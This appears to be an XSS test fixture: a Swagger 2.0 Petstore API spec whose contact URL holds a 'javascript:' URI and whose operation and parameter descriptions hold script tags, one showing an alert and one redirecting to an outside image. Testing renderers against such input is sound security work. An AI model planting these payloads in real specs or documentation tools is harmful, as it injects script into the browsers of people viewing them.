| { | |
| "swagger": "2.0", | |
| "info": { | |
| "version": "1.0.0", | |
| "title": "Swagger Petstore", | |
| "contact":{ | |
| "name": "API Support", | |
| "url": "javascript:alert('xss')" | |
| } | |
| }, | |
| "paths": { | |
| "/pets": { | |
| "get": { | |
| "description": "<script>alert('This is DNLALB executing random code on your machine....')</script>", | |
| "operationId": "findPets", | |
| "produces": [ | |
| "application/json", | |
| "application/xml", | |
| "text/xml", | |
| "text/html" | |
| ], | |
| "parameters": [ | |
| { | |
| "name": "tags", | |
| "in": "query", | |
| "description": "<script>window.location = 'https://www.cloudbric.com/wp-content/uploads/2017/01/XSS_3.png'</script>", | |
| "required": false, | |
| "type": "array", | |
| "items": { | |
| "type": "string" | |
| }, | |
| "collectionFormat": "csv" | |
| }, | |
| { | |
| "name": "limit", | |
| "in": "query", | |
| "description": "maximum number of results to return", | |
| "required": false, | |
| "type": "integer", | |
| "format": "int32" | |
| } | |
| ], | |
| "responses": { | |
| "200": { | |
| "description": "pet response", | |
| "schema": { | |
| "type": "string" | |
| } | |
| }, | |
| "default": { | |
| "description": "unexpected error" | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } |